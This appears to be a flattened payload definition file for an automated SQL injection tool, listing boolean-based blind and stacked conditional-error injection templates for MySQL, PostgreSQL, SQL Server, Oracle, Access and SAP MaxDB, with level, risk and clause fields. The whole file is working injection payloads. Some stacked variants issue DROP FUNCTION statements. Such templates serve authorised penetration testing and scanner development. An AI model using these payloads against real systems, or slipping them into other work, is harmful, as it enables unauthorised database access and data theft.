AND boolean-based blind - WHERE or HAVING clause 1 1 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] AND [RANDNUM]=[RANDNUM1]
AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] # AND [RANDNUM]=[RANDNUM1]
MySQL
AND boolean-based blind - WHERE or HAVING clause (Generic comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] -- AND [RANDNUM]=[RANDNUM1]
OR boolean-based blind - WHERE or HAVING clause 1 2 3 1 2 OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) OR ([RANDNUM]=[RANDNUM1])
OR boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 3 3 1 2 OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) # OR ([RANDNUM]=[RANDNUM1])
MySQL
OR boolean-based blind - WHERE or HAVING clause (Generic comment) 1 3 3 1 2 OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) -- OR ([RANDNUM]=[RANDNUM1])
MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) 1 3 1 1,2,3 1 RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))
MySQL
Generic boolean-based blind - Parameter replace (original value) 1 2 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) 1 3 1 1,2,3 3 MAKE_SET([INFERENCE],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
MySQL boolean-based blind - Parameter replace (ELT - original value) 1 4 1 1,2,3 3 ELT([INFERENCE],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
MySQL boolean-based blind - Parameter replace (bool*int - original value) 1 4 1 1,2,3 3 ([INFERENCE])*[ORIGVALUE] ([RANDNUM]=[RANDNUM])*[ORIGVALUE] ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]
MySQL
MySQL >= 5.0 boolean-based blind - Parameter replace (original value) 1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - Parameter replace (original value) 1 4 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) 1 3 2 1,2,3 3 (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server/Sybase (Windows)
Oracle boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Microsoft Access boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 IIF([INFERENCE],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
SAP MaxDB boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
SAP MaxDB
Generic boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))
Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value) 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 3 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server/Sybase (Windows)
Oracle boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,IIF([INFERENCE],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
PostgreSQL stacked conditional-error blind queries 1 3 0 0 2 ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
PostgreSQL
Microsoft SQL Server/Sybase stacked conditional-error blind queries 1 3 0 0 1 ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
Microsoft SQL Server/Sybase (Windows)